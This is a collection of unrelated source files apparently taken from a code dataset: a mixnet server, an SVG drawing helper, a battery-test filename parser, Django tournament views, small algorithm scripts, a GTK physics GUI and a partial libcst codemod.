print("FrontServer accepted connection from " + str(client_addr))
# Spawn a thread to handle the client
threading.Thread(target=self.handleMsg, args=(conn, client_addr,)).start()
# This runs in a thread and handles messages from clients
def handleMsg(self, conn, client_addr):
# Receive data from client
clientData = conn.recv(32768).decode("utf-8")
# Format as message
clientMsg = Message()
clientMsg.loadFromString(clientData)
clientIP = client_addr[0]
if clientMsg.getNetInfo() != 1 and clientMsg.getNetInfo() != 2:
print("FrontServer got " + clientData)
# Check if the packet is for setting up a connection
if clientMsg.getNetInfo() == 0:
# Add client's public key to our list of clients
clientPort, clientPublicKey = clientMsg.getPayload().split("|")
# Build the entry for the client. See clientList above
# Store the public key as a string
clientEntry = ((clientIP, clientPort), clientPublicKey)
if clientEntry not in self.clientList:
self.clientList.append(clientEntry)
conn.close()
elif clientMsg.getNetInfo() == 1:
print("Front Server received message from client")
# Process packets coming from a client and headed towards
# a dead drop only if the current round is active and the client
# hasn't already send a msessage
clientPublicKey, payload = clientMsg.getPayload().split("#", 1)
if self.currentRound.open and clientPublicKey not in self.clientPublicKeys:
# Decrypt one layer of the onion message
clientLocalKey, newPayload = TU.decryptOnionLayer(
self.__privateKey, payload, serverType=0)
clientMsg.setPayload(newPayload)
# Save the message data
# TODO (jose) -> use the lock here. Multiple threads could try to
# access this info at the same time. In fact, we should process
# messages with netinfo == 1 ONE AT A TIME or could create inconsistences.
self.clientPublicKeys.append(clientPublicKey)
self.clientLocalKeys.append(clientLocalKey)
self.clientMessages.append(clientMsg)
elif clientMsg.getNetInfo() == 2:
print("FrontServer received message from Middle server")
# TODO -> add a lock here, same as with netinfo == 1
# Encrypt one layer of the onion message
clientLocalKey = self.clientLocalKeys[ len(self.clientMessages) ]
newPayload = TU.encryptOnionLayer(self.__privateKey,
clientLocalKey,
clientMsg.getPayload())
clientMsg.setPayload(newPayload)
self.clientMessages.append(clientMsg)
elif clientMsg.getNetInfo() == 3:
# Dialing Protocol: Client -> DeadDrop
_, newPayload = TU.decryptOnionLayer(
self.__privateKey, clientMsg.getPayload(), serverType=0)
clientMsg.setPayload(newPayload)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.nextServerIP, self.nextServerPort))
sock.sendall(str(clientMsg).encode("utf-8"))
sock.close()
# A thread running this method will be in charge of the different rounds
def manageRounds(self):
while True:
time.sleep(10)
# Reset the saved info about the messages for the round before it starts
self.clientLocalKeys = []
self.clientIPsAndPorts = []
self.clientMessages = []
# Create the new round using our class above
self.currentRound = RoundInfo(round, self.roundDuration)
self.rounds[self.roundID] = self.currentRound
print("Front Server starts round: ", self.roundID)
# Tell all the clients that a new round just started
firstMsg = Message()
firstMsg.setNetInfo(5)
for clientIpAndPort, clientPK in self.clientList:
tempSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tempSock.connect((clientIpAndPort[0], int(clientIpAndPort[1])))
tempSock.sendall(str.encode(str(firstMsg)))
tempSock.close()
# Start timer
startTime = time.process_time()
# Allow clients to send messages for duration of round
# Clients can only send message while self.currentRound.open == True
while time.process_time() - startTime < self.roundDuration:
continue
# Now that round has ended, mark current round as closed
self.currentRound.open = False
# TODO -> Once the noice addition is added, the rounds should ALWAYS
# run, no matter if there are no messages
if len(self.clientMessages) > 0:
# Now that all the messages are stored in self.clientMessages,
# run the round
self.runRound()
print("Front Server finished round: ", self.roundID)
self.roundID += 1
# Runs server round. Assuming that the messages are stores in
# self.clientMessages, adds noise, shuffles them and forwards them to
# the next server
def runRound(self):
# TODO (jose): Noise addition goes here
# Apply the mixnet by shuffling the messages
nMessages = len(self.clientMessages)
permutation = TU.generatePermutation(nMessages)
shuffledMessages = TU.shuffleWithPermutation(self.clientMessages,
permutation)
# Also shuffle the messages so they still match the clientMessages:
# self.clientLocalKeys[ i ] is the key that unlocks message self.clientMessges[ i ]
# This is used afterwards in handleMessage, getNetInfo() == 2
self.clientLocalKeys = TU.shuffleWithPermutation(self.clientLocalKeys,
permutation)
# Forward all the messages to the next server
# Send a message to the next server notifying of the numbers of
# messages that will be sent
firstMsg = Message()
firstMsg.setNetInfo(4)
firstMsg.setPayload("{}".format(nMessages))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.nextServerIP, self.nextServerPort))
sock.sendall(str(firstMsg).encode("utf-8"))
sock.close()
# Send all the messages to the next server
for msg in shuffledMessages:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((self.nextServerIP, self.nextServerPort))
sock.sendall(str(msg).encode("utf-8"))
sock.close()
# Restart the messages so that we receive the responses from the
# next server
self.clientMessages = []
# Wait until we have received all the responses. These responses are
# handled in the main thread using the method handleMsg with
# msg.getNetInfo == 2
print("Front Server waiting for responses from Middle Server")
while len(self.clientMessages) < nMessages:
continue
# Unshuffle the messages
self.clientMessages = TU.unshuffleWithPermutation(self.clientMessages,
permutation)
# Send each response back to the correct client
for clientPK, msg in zip(self.clientPublicKeys, self.clientMessages):
# Find the client ip and port using the clients keys
matches = [ (ip, port) for ((ip, port), pk) in self.clientList
if clientPK == pk]
if len(matches) == 0:
print("Front server error: couldn't find client where to send the response")
continue
elif len(matches) > 1:
print("Front server error: too many clients where to send the response")
continue
clientIP, clientPort = matches[0]
clientPort = int(clientPort)
tempSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tempSock.connect((clientIP, clientPort))
tempSock.sendall(str(msg).encode("utf-8"))
tempSock.close()
|
StarcoderdataPython
|
1791918
|
<filename>factorioBlueprintVisualizer/draw.py
import numpy as np
def get_drawing(bbox_width, bbox_height, svg_width_in_mm=250, background_color="#dddddd", metadata_str=None):
dwg = [f'<svg baseProfile="tiny" height="{svg_width_in_mm*bbox_height/bbox_width}mm" version="1.2" viewBox="0,0,{bbox_width},{bbox_height}" width="{svg_width_in_mm}mm" xmlns="http://www.w3.org/2000/svg" xmlns:ev="http://www.w3.org/2001/xml-events" xmlns:xlink="http://www.w3.org/1999/xlink">']
if metadata_str is not None:
dwg.append(metadata_str)
if background_color is not None:
dwg.append(f'<rect fill="{background_color}" height="10000" width="10000" x="-100" y="-100" />')
return dwg
def draw_lines(dwg, lines, svg_setting):
dwg.append('<path')
append_svg_setting(dwg, svg_setting)
dwg.append(' d="')
for p1, p2 in lines:
dwg.append('M{} {} {} {}'.format(*p1, *p2))
dwg.append('"/>')
def append_svg_setting(dwg, svg_setting, deny_list=[]):
for key, value in svg_setting.items():
if key not in deny_list:
dwg.append(f' {key}="{value}"')
def append_group(dwg, svg_setting, deny_list=[]):
dwg.append('<g')
append_svg_setting(dwg, svg_setting, deny_list)
dwg.append('>')
def draw_rect(dwg, mid, size, scale, rx, ry):
if scale is not None:
size = (size[0] * scale, size[1] * scale)
dwg.append(f'<rect height="{size[1]}" width="{size[0]}" x="{mid[0]-size[0]/2}" y="{mid[1]-size[1]/2}"')
if rx is not None:
dwg.append(f' rx="{rx}" ')
if ry is not None:
dwg.append(f' ry="{ry}" ')
dwg.append('/>')
|
StarcoderdataPython
|
1668884
|
from filename_database.models import ExperimentType, ChargerDriveProfile, Category, SubCategory, ValidMetadata
import re
import datetime
import itertools
def guess_exp_type(file, root):
"""
This function takes a file as input and guesses what experiment type it is.
:param file:
:param root:
:return: the experiment type
"""
lowercase_file = file.lower()
fileList = re.split(r'-|_|\.|\s', lowercase_file)
#We handle cycling, formation and fra, maccor is only exception
cat_match = {
'cycling': r'(^cyc$)|(^cycling$)',
'formation': r'(^form$)|(^fm$)',
'impedance': r'^fra$',
'rpt': r'^rpt$',
}
cat = None
broken = False
for k in cat_match.keys():
if broken:
break
for elem in fileList:
if re.match(cat_match[k], elem):
cat = Category.objects.get(name=k)
broken = True
break
if cat is not None:
# try to match subcategory
sub_match = {
'neware':r'(^neware$)|(^nw$)',
'moli':r'^mo$',
'uhpc':r'^uhpc$',
'novonix':r'(^novonix$)|(^nx$)',
}
sub = None
broken = False
for k in sub_match.keys():
if broken:
break
for elem in fileList[1:]:
if re.match(sub_match[k], elem):
sub = SubCategory.objects.get(name=k)
broken = True
break
if sub is None:
if 'NEWARE' in root:
sub = SubCategory.objects.get(name='neware')
else:
sub = SubCategory.objects.get(name='maccor')
exp_type = ExperimentType.objects.get(category=cat, subcategory=sub)
#TODO: make a table in the experiment type to be the valid regexp for file extension.
if sub.name=='neware':
if lowercase_file.split('.')[-1] != 'txt':
return None
return exp_type
#handle the rest
match = [
('gas', 'insitu', r'(^insitugas$)|(^insitu$)|(^gasinsitu$)'),
('impedance', 'eis', r'^eis$'),
('impedance', 'symmetric', r'(^sym$)|(^symmetric$)'),
('thermal', 'arc', r'^arc$'),
('thermal', 'microcalorimetry', r'^tam$'),
('storage', 'smart', r'smart'),
('storage', 'dumb', r'dumb'),
('electrolyte', 'gcms', r'^gcms$'),
('electrolyte', 'ldta', r'^ldta$'),
('electrode', 'xps', r'^xps$'),
]
for c, s, p in match:
for elem in fileList:
if re.search(p, elem):
cat = Category.objects.get(name=c)
sub = SubCategory.objects.get(name=s)
if cat.name == 'impedance' and sub.name == 'eis':
if 'MACCOR' in root:
sub = SubCategory.objects.get(name='maccor')
exp_type = ExperimentType.objects.get(category=cat, subcategory=sub)
return exp_type
return None
##============================================================================================##
# META-DATA EXTRACTOR FUNCTION #
##============================================================================================##
def get_date_obj(date_str):
"""
parse date string
:param date_str:
:return:
"""
mat1 = re.match(r'20(\d{2,2})(\d{2,2})(\d{2,2})', date_str)
mat2 = re.match(r'(\d{2,2})(\d{2,2})(\d{2,2})', date_str)
if mat1:
mat = mat1
elif mat2:
mat = mat2
else:
return None
year = 2000 + int(mat.group(1))
month = int(mat.group(2))
day = int(mat.group(3))
try :
return datetime.date(year,month,day)
except ValueError:
return None
# Function Definition
# Takes in name of file and experiment type as arguments
def deterministic_parser(filename, exp_type):
"""
given a filename and an experiment type,
parse as much metadata as possible
and return a valid_metadata object (None means no parsing, valid metadata with gaps in in means partial parsing.)
:param filename:
:param exp_type:
:return:
"""
lowercase_file = filename.lower()
fileList = re.split(r'-|_|\.|\s', lowercase_file)
def get_charID(fileList):
max_look = min(3, len(fileList)-1)
for elem in fileList[:max_look]:
if re.match(r'^[a-z]{2,5}$', elem) and not (
re.search(
r'(cyc)|(gcms)|(rpt)|(eis)|(fra)|(sym)|(arc)|(tam)|(xps)|(fm)|(mo)|(nw)|(nx)',
elem)):
return elem
return None
def get_possible_cell_ids(fileList):
possible_cell_ids = []
max_look = min(5, len(fileList) - 1)
for elem in fileList[:max_look]:
if (not re.match(r'200[8-9]0[1-9][0-3][0-9]$|'
r'200[8-9]1[0-2][0-3][0-9]$|'
r'20[1-2][0-9]0[1-9][0-2][0-9]$|'
r'20[1-2][0-9]1[0-1][0-2][0-9]$|'
r'20[1-2][0-9]0[1-9][0-3][0-1]$|'
r'20[1-2][0-9]1[0-1][0-3][0-1]$|'
r'0[8-9]0[1-9][0-3][0-9]$|'
r'0[8-9]1[0-2][0-3][0-9]$|'
r'[1-2][0-9]0[1-9][0-2][0-9]$|'
r'[1-2][0-9]1[0-2][0-2][0-9]$|'
r'[1-2][0-9]0[1-9][0-3][0-1]$|'
r'[1-2][0-9]1[0-2][0-3][0-1]$',
elem)) and (re.match(r'^(\d{5,6})$|^(0\d{5,5})$', elem)) and elem.isdigit():
possible_cell_ids.append( int(elem))
return possible_cell_ids
def get_start_cycle(fileList, avoid=None):
max_look = min(7, len(fileList) - 1)
for elem in fileList[: max_look]:
match = re.match(r'^c(\d{1,4})$', elem)
if match:
if avoid is not None and avoid == int(match.group(1)):
avoid = None
continue
return int(match.group(1))
return None
def get_temperature(fileList):
for elem in fileList:
match = re.match(r'^(\d{2})c$', elem)
if match:
return int(match.group(1))
return None
def get_voltage(fileList):
for elem in fileList:
match = re.match(r'^(\d{1,3})v$', elem)
if match:
str_voltage = match.group(1)
n = len(str_voltage)
divider = 10.**(float(n)-1)
return float(str_voltage)/divider
return None
def get_possible_dates(fileList):
possible_dates = []
for elem in fileList:
if re.match(r'^[0-9]{6,8}$', elem):
date = get_date_obj(elem)
if date is not None:
possible_dates.append(date)
return possible_dates
def get_version_number(fileList):
for field in fileList:
match = re.match(r'v(\d)', field)
if match:
return int(match.group(1))
def get_ac_increment(fileList):
for i in range(len(fileList) - 1):
match1 = re.match(r'^sym$', fileList[i])
matchA = re.match(r'^a(\d{1,3})$', fileList[i + 1])
matchC = re.match(r'^c(\d{1,3})$', fileList[i + 1])
if match1 and matchA:
return ValidMetadata.ANODE, int(matchA.group(1))
elif match1 and matchC:
return ValidMetadata.CATHODE, int(matchC.group(1))
return None, None
def get_ac(fileList):
for i in range(len(fileList) - 1):
match1 = re.match(r'^xps$', fileList[i])
matchA = re.match(r'^a$', fileList[i + 1])
matchC = re.match(r'^c$', fileList[i + 1])
if match1 and matchA:
return ValidMetadata.ANODE
elif match1 and matchC:
return ValidMetadata.CATHODE
return None
drive_profile_match_dict = {
'cxcy': (r'^c(\d{1,2})c(\d{1,2})$', ChargerDriveProfile.objects.get(drive_profile='CXCY'), True, True),
'xcyc': (r'^(\d{1,2})c(\d{1,2})c$', ChargerDriveProfile.objects.get(drive_profile='CXCY'), False, False),
'xccy': (r'^(\d{1,2})cc(\d{1,2})$', ChargerDriveProfile.objects.get(drive_profile='CXCY'), False, True),
'cxcyc': (r'^c(\d{1,2})c(\d{1,2})c$', ChargerDriveProfile.objects.get(drive_profile='CXCYc'), True, True),
'xcycc': (r'^(\d{1,2})c(\d{1,2})cc$', ChargerDriveProfile.objects.get(drive_profile='CXCYc'), False, False),
'xccyc': (r'^(\d{1,2})cc(\d{1,2})c$', ChargerDriveProfile.objects.get(drive_profile='CXCYc'), False, True),
'cxrc': (r'^c(\d{1,2})rc$', ChargerDriveProfile.objects.get(drive_profile='CXrc'), True),
'xcrc': (r'^(\d{1,2})crc$', ChargerDriveProfile.objects.get(drive_profile='CXrc'), False),
'cxcyb': (r'^c(\d{1,2})c(\d{1,2})b$', ChargerDriveProfile.objects.get(drive_profile='CXCYb'), True, True),
'xcycb': (r'^(\d{1,2})c(\d{1,2})cb$', ChargerDriveProfile.objects.get(drive_profile='CXCYb'), False, False),
'xccyb': (r'^(\d{1,2})cc(\d{1,2})b$', ChargerDriveProfile.objects.get(drive_profile='CXCYb'), False, True),
'cxsz': (r'^c(\d{1,2})s(\d{2,3})$', ChargerDriveProfile.objects.get(drive_profile='CXsZZZ'), True),
'xcsz': (r'^(\d{1,2})cs(\d{2,3})$', ChargerDriveProfile.objects.get(drive_profile='CXsZZZ'), False),
'cx': (r'^c(\d{1,2})$', ChargerDriveProfile.objects.get(drive_profile='CX'), True),
'xc': (r'^(\d{1,2})c$', ChargerDriveProfile.objects.get(drive_profile='CX'), False),
}
def get_possible_drive_profiles(fileList):
possible_drive_profiles = []
if len(fileList) < 4:
return possible_drive_profiles
for elem in fileList[3:]:
if re.match(r'(^0c$)|(^20c$)|(^40c$)|(^55c$)|(^c0$)|(^c1$)', elem):
continue
for k in drive_profile_match_dict.keys():
m = re.match(drive_profile_match_dict[k][0], elem)
if m:
#special cases
my_dp = {'drive_profile': drive_profile_match_dict[k][1]}
if drive_profile_match_dict[k][2]:
my_dp['drive_profile_x_numerator'] = 1
my_dp['drive_profile_x_denominator'] = int(m.group(1))
else:
my_dp['drive_profile_x_numerator'] = int(m.group(1))
my_dp['drive_profile_x_denominator'] = 1
if ((drive_profile_match_dict[k][1].drive_profile=='CXCY') and
(drive_profile_match_dict[k][2] == drive_profile_match_dict[k][3]) and
(m.group(1) == m.group(2))):
# CXCX
my_dp['drive_profile'] = ChargerDriveProfile.objects.get(drive_profile='CXCX')
elif drive_profile_match_dict[k][1].drive_profile=='CXsZZZ':
# CXsZZZ
n = len(m.group(2))
my_dp['drive_profile_z'] = float(m.group(2))/(10.**(float(n)-1))
else:
if len(drive_profile_match_dict[k]) == 4:
if drive_profile_match_dict[k][3]:
my_dp['drive_profile_y_numerator'] = 1
my_dp['drive_profile_y_denominator'] = int(m.group(1))
else:
my_dp['drive_profile_y_numerator'] = int(m.group(1))
my_dp['drive_profile_y_denominator'] = 1
possible_drive_profiles.append(my_dp)
break
return possible_drive_profiles
# TODO: once you have a date, you must prevent cell_id from being that date.
# TODO: for now, if multiple alternatives show up, take first one and print.
metadata = ValidMetadata(experiment_type=exp_type)
valid = True
charID = get_charID(fileList)
if charID is None:
valid = False
else:
metadata.charID = charID
dates = get_possible_dates(fileList)
if len(dates) == 0:
valid = False
elif len(dates) > 1:
metadata.date = dates[0]
else:
metadata.date = dates[0]
if exp_type.cell_id_active:
cell_ids = get_possible_cell_ids(fileList)
if len(cell_ids) == 0:
valid = False
else:
if metadata.date is None:
if len(cell_ids) > 1:
valid = False
else:
metadata.cell_id = cell_ids[0]
else:
valid_cell_ids = []
for cell_id in cell_ids:
date_pieces = [metadata.date.year % 100, metadata.date.month, metadata.date.day]
all_perms = list(itertools.permutations(date_pieces))
cell_id_ok = True
for p in all_perms:
if cell_id == p[0] + p[1]*100 + p[2]*10000:
cell_id_ok = False
break
if cell_id_ok:
valid_cell_ids.append(cell_id)
if len(valid_cell_ids) > 1 or len(valid_cell_ids) == 0:
valid = False
else:
metadata.cell_id = valid_cell_ids[0]
if exp_type.AC_active and exp_type.AC_increment_active:
ac, increment = get_ac_increment(fileList)
if ac is None:
valid = False
else:
metadata.AC = ac
metadata.AC_increment = increment
if exp_type.AC_active and not exp_type.AC_increment_active:
ac = get_ac(fileList)
if ac is None:
valid = False
else:
metadata.AC = ac
if exp_type.start_cycle_active:
avoid = None
if metadata.AC is not None and metadata.AC == ValidMetadata.CATHODE and metadata.AC_increment is not None:
avoid = metadata.AC_increment
start_cycle = get_start_cycle(fileList, avoid)
if start_cycle is None:
valid = False
else:
metadata.start_cycle = start_cycle
if exp_type.voltage_active:
voltage = get_voltage(fileList)
if voltage is None:
valid = False
else:
metadata.voltage = voltage
if exp_type.temperature_active:
temperature = get_temperature(fileList)
if temperature is None:
valid = False
else:
metadata.temperature = temperature
if exp_type.drive_profile_active:
drive_profiles = get_possible_drive_profiles(fileList)
if not len(drive_profiles) == 0:
if not exp_type.start_cycle_active or metadata.start_cycle is None:
dp = drive_profiles[0]
for key in dp.keys():
setattr(metadata, key, dp[key])
else:
for dp in drive_profiles:
if dp['drive_profile'].test == 'CX' and dp['drive_profile_x_denominator'] == metadata.start_cycle:
continue
dp = drive_profiles[0]
for key in dp.keys():
setattr(metadata, key, dp[key])
break
if exp_type.version_number_active:
version_number = get_version_number(fileList)
if version_number is None:
valid = False
else:
metadata.version_number = version_number
print("\t\tEXTRACTED METADATA: {}".format(metadata))
return metadata, valid
|
StarcoderdataPython
|
1670427
|
<gh_stars>1-10
from django.shortcuts import render, get_object_or_404, redirect
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from django.utils import timezone
from collections import defaultdict
from tournament.models import Tournament, Participant, Game, TournamentRound,\
Season, TournamentType
from player.models import Player
from pairing.utils import Pairing
#from tournament.forms import PlayerForm
@login_required
def tournament_list(request):
tourneys = Tournament.objects.filter(active=True).exclude(
kind__pairing_type=TournamentType.AUTO)
return render(
request,
'tournament/list.html',
{'tourneys': tourneys, 'tourney_types': TournamentType.objects.all()})
@login_required
def register(request, id):
tourney = get_object_or_404(Tournament, pk=id)
if request.method == 'POST':
player = Player.objects.get(user=request.user)
Participant.objects.get_or_create(player=player, tournament=tourney)
parts = [i.player for i in Participant.objects.filter(tournament=tourney)]
return render(
request,
'tournament/register.html',
{
'tourney': tourney,
'participants': parts,
}
)
def join(request, tournament_id, player_id):
tourney = get_object_or_404(Tournament, pk=tournament_id)
player = get_object_or_404(Player, pk=player_id)
Participant.objects.get_or_create(player=player, tournament=tourney)
# Give bye for every missed round
for tourney_round in TournamentRound.objects.filter(
tournament=tourney, paired=True):
Game.objects.create(
tourney_round=tourney_round,
white=player,
black=None,
white_score=settings.BYE_SCORE,
comment='Bye',
synced=True)
return redirect('tournament_register', id=tournament_id)
def pairings(request, id):
tourney = get_object_or_404(Tournament, pk=id)
tourney_round = tourney.current_round
games = Game.objects.filter(tourney_round=tourney_round)
return render(
request,
'tournament/pairings.html',
{
'tourney': tourney,
'current_round': tourney_round,
'games': games
})
def run_pairings(request, id):
tourney_round = get_object_or_404(TournamentRound, pk=id)
tourney = tourney_round.tournament
history = [(i.white.id, i.black.id) for i in Game.objects.filter(
tourney_round__tournament=tourney)]
participants = [
{'id': i.player.id, 'score': i.score}
for i in Participant.objects.filter(tournament=tourney)]
pair = Pairing(participants, history=history)
for left, right in pair.output:
white = Player.objects.get(pk=left)
black = Player.objects.get(pk=right)
Game.objects.create(
tourney_round=tourney_round,
white=white,
black=black)
if pair.remainder:
#import pdb;pdb.set_trace()
white = Player.objects.get(pk=pair.remainder[0]['id'])
Game.objects.create(
tourney_round=tourney_round,
white=white,
black=None,
white_score=settings.BYE_SCORE,
comment='Bye',
synced=True)
tourney_round.paired = True
tourney_round.save()
messages.success(request, 'Pairings completed')
return redirect('tournament_pairings', id=tourney.id)
def leaderboard(request, id):
tourney_type = get_object_or_404(TournamentType, pk=id)
now = timezone.now().date()
season = Season.objects.filter(start_date__lte=now, end_date__gte=now)
_participants = Participant.objects.filter(
tournament__kind=tourney_type, tournament__season=season)
participants = sorted(_participants, key=lambda x: x.score, reverse=True)
d = defaultdict(list)
for participant in participants:
if participant.player.handle:
if len(d[participant.player.handle]) == 10:
continue
else:
d[participant.player.handle].append(participant.score)
out = [{'name': key, 'score': sum(val)} for key, val in d.items()]
#out = [{'name': key, 'score': val} for key, val in d.items()]
out.sort(key=lambda x: x['score'], reverse=True)
return render(
request,
'tournament/leaderboard.html',
{'players': out, 'kind': tourney_type})
|
StarcoderdataPython
|
97797
|
# Generated by Django 3.1.3 on 2020-12-07 21:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dualtext_api', '0007_auto_20201207_2106'),
]
operations = [
migrations.AddField(
model_name='label',
name='color',
field=models.JSONField(null=True),
),
migrations.AddField(
model_name='label',
name='key_code',
field=models.CharField(max_length=1, null=True),
),
]
|
StarcoderdataPython
|
1756357
|
def f(R,G,B):
return 2126*R+7152*G+722*B
def g(a):
if 0 <= a <510000:
return "#"
elif 510000<= a<1020000:
return "o"
elif 1020000<=a<1530000:
return "+"
elif 1530000<=a<2040000:
return "-"
elif a>=2040000:
return "."
N,M=list(map(int,input().split()))
L=[]
for i in range(N):
L.append(list(map(int,input().split())))
for i in range(N):
for j in range(0,3*M,3):
print(g(f(L[i][j],L[i][j+1],L[i][j+2])),end="")
print()
|
StarcoderdataPython
|
41654
|
<filename>835.Image-Overlap.py
# https://leetcode.com/problems/monotonic-array/description/
#
# algorithms
# Medium (42.6%)
# Total Accepted: 4.8k
# Total Submissions: 11.2k
# beats 77.52% of python submissions
class Solution(object):
def largestOverlap(self, A, B):
"""
:type A: List[List[int]]
:type B: List[List[int]]
:rtype: int
"""
length = len(A)
A_1_arr, B_1_arr = [], []
for i in xrange(length):
for j in xrange(length):
if A[i][j] == 1:
A_1_arr.append((i, j))
if B[i][j] == 1:
B_1_arr.append((i, j))
res = 0
for i in xrange(length):
for j in xrange(length):
cnt_sum_A, cnt_sum_B = 0, 0
for x, y in A_1_arr:
if x + i < length and y + j < length and B[x + i][y + j] == 1:
cnt_sum_A += 1
for x, y in B_1_arr:
if x + i < length and y + j < length and A[x + i][y + j] == 1:
cnt_sum_B += 1
res = max(res, cnt_sum_A, cnt_sum_B)
return res
|
StarcoderdataPython
|
1763716
|
<gh_stars>0
from django.db import models
from users.models import ModelTemplate,Departments
# Create your models here.
class Unit(ModelTemplate):
name=models.CharField(max_length=50,default=None)
class Meta:
ordering = ['created_date']
class Product_category(ModelTemplate):
name=models.CharField(max_length=50,default=None)
code=models.CharField(max_length=50,default=None)
Departments_id=models.ForeignKey(Departments,on_delete=models.CASCADE)
class Meta:
ordering = ['created_date']
|
StarcoderdataPython
|
3236341
|
<gh_stars>1-10
from django.core.wsgi import get_wsgi_application
from brouwers.setup import setup_env
setup_env()
application = get_wsgi_application()
|
StarcoderdataPython
|
42753
|
<gh_stars>10-100
import pygtk
import gtk
import IO
import numpy
class TilingMatrix(gtk.Frame):
def __init__(self):
gtk.Frame.__init__(self, 'Orbital tiling')
self.matrix = numpy.array([[1,0,0],[0,1,0],[0,0,1]])
self.set_label('Orbital tiling')
self.TileTable = gtk.Table(3,3)
self.TileOrbitals = gtk.CheckButton('Tile orbitals')
self.TileOrbitals.set_active(False)
self.TileOrbitals.connect("toggled", self.tile_toggled)
self.TileButtons = []
for i in range(0,3):
TileList = []
for j in range(0,3):
tile = gtk.SpinButton\
(gtk.Adjustment(0.0, -100.0, 100.0, 1.0, 2.0))
if (i == j):
tile.set_value(self.matrix[i,j])
tile.set_digits(0)
tile.set_width_chars(2)
tile.connect('value_changed', self.matrix_changed)
self.TileTable.attach(tile, i, i+1, j, j+1)
TileList.append(tile)
self.TileButtons.append(TileList)
vbox = gtk.VBox()
self.UnitLabel = gtk.Label()
self.UnitLabel.set_text('Unit cells: 1')
vbox.pack_start(self.TileOrbitals)
vbox.pack_start(self.TileTable)
vbox.pack_start(self.UnitLabel)
self.TileTable.set_sensitive(False)
self.add(vbox)
def matrix_changed(self, button):
units = self.get_units()
self.UnitLabel.set_text('Unit cells: %d' %(units))
def get_units(self):
mat = self.get_matrix()
units = numpy.abs(numpy.linalg.det(mat))
return units
def get_matrix(self):
mat = []
for i in range(0,3):
row = []
for j in range(0,3):
row.append(int(self.TileButtons[i][j].get_value()))
mat.append(row)
return numpy.array(mat)
def set_matrix(self, mat):
for i in range(0,3):
for j in range(0,3):
TileButtons[i,j].set_value(mat[i,j])
def tile_toggled(self, button):
self.TileTable.set_sensitive(button.get_active())
class Orbitals(gtk.Frame):
def h5_chosen_callback(self, fileDialog, response):
if (response == gtk.RESPONSE_ACCEPT):
filename = self.FileButton.get_filename()
# Check to see if the file is a valid PP file
okay = self.read_h5_file(filename)
def read_eshdf (self, io):
# Read primitive lattice
io.OpenSection('supercell')
self.prim_vecs = io.ReadVar('primitive_vectors')
a = numpy.max(numpy.abs(self.prim_vecs))
io.CloseSection()
self.Geometry.LatticeFrame.set_lattice(self.prim_vecs)
self.Geometry.LatticeFrame.ArbRadio.set_active(True)
# Read atom species
io.OpenSection('atoms')
num_species = io.ReadVar ('number_of_species')
oldtypes = self.Geometry.Types.GetElementTypes()
# for t in oldtypes:
# self.Geometry.Types.Remove
TypeList = []
for isp in range(0,num_species):
io.OpenSection('species')
Z = io.ReadVar('atomic_number')
Zion = io.ReadVar('valence_charge')
symbol = self.Geometry.Types.Elements.ElementList[Z-1][1]
TypeList.append(symbol)
row = self.Geometry.Types.AddRow(None)
row.set_elem (symbol, Z)
if (Zion != Z):
row.combo.set_active(1)
io.CloseSection()
# Read atom positions
N = io.ReadVar('number_of_atoms')
self.Geometry.AtomPos.set_num_atoms(N)
pos = io.ReadVar('reduced_positions')
self.Geometry.AtomPos.set_atom_positions(pos)
for symbol in TypeList:
self.Geometry.AtomPos.AddTypeCallback(None, symbol)
io.CloseSection()
def read_h5_file(self, filename):
io = IO.IOSectionClass()
if (not io.OpenFile(filename)):
return False
format = io.ReadVar('format')
if (format == 'ES-HDF'):
return self.read_eshdf (io)
return False
def __init__(self, geometry):
self.Geometry = geometry
gtk.Frame.__init__(self, "Orbitals")
# Setup orbital HDF5 file chooser
filter = gtk.FileFilter()
filter.add_pattern("*.h5")
filter.set_name ("XML files")
buttons = (gtk.STOCK_CANCEL,gtk.RESPONSE_CANCEL,\
gtk.STOCK_OPEN,gtk.RESPONSE_ACCEPT)
self.FileDialog = gtk.FileChooserDialog \
("Select orbital file", buttons=buttons)
self.FileDialog.set_action(gtk.FILE_CHOOSER_ACTION_OPEN)
self.FileDialog.connect("response", self.h5_chosen_callback)
self.FileButton = gtk.FileChooserButton(self.FileDialog)
self.FileButton.add_filter(filter)
self.FileButton.set_sensitive(True)
self.FileButton.set_action (gtk.FILE_CHOOSER_ACTION_OPEN)
filebox = gtk.HBox(True)
vbox = gtk.VBox(True)
self.TileFrame = TilingMatrix()
filebox.pack_start(self.FileButton, True, False)
filebox.pack_start(self.TileFrame , True, False)
self.add(filebox)
def tile_matrix_changed(self, button):
print
class Jastrows(gtk.Frame):
def __init__(self):
gtk.Frame.__init__(self, "Jastrow correlation functions")
class Wavefunction(gtk.VBox):
def __init__(self, geometry):
gtk.VBox.__init__(self)
self.OrbitalsFrame = Orbitals(geometry)
self.pack_start (self.OrbitalsFrame, False, False, 4)
self.Geometry = geometry
self.JastrowsFrame = Jastrows()
self.pack_start (self.JastrowsFrame, False, False, 4)
# self.Widgets.append (self.FileButton)
|
StarcoderdataPython
|
20837
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
# pyre-strict
from typing import Union
import libcst
import libcst.matchers as m
from libcst import parse_expression
from libcst.codemod import VisitorBasedCodemodCommand
from libcst.codemod.visitors import AddImportsVisitor
from libcst.metadata import QualifiedNameProvider
class StripStringsCommand(VisitorBasedCodemodCommand):
DESCRIPTION: str = "Converts string type annotations to 3.7-compatible forward references."
METADATA_DEPENDENCIES = (QualifiedNameProvider,)
# We want to gate the SimpleString visitor below to only SimpleStrings inside
# an Annotation.
@m.call_if_inside(m.Annotation())
# We also want to gate the SimpleString visitor below to ensure that we don't
# erroneously strip strings from a Literal.
@m.call_if_not_inside(
m.Subscript(
# We could match on value=m.Name("Literal") here, but then we might miss
# instances where people are importing typing_extensions directly, or
# importing Literal as an alias.
value=m.MatchMetadataIfTrue(
QualifiedNameProvider,
lambda qualnames: any(
qualname.name == "typing_extensions.Literal"
for qualname in qualnames
),
)
)
)
def leave_SimpleString(
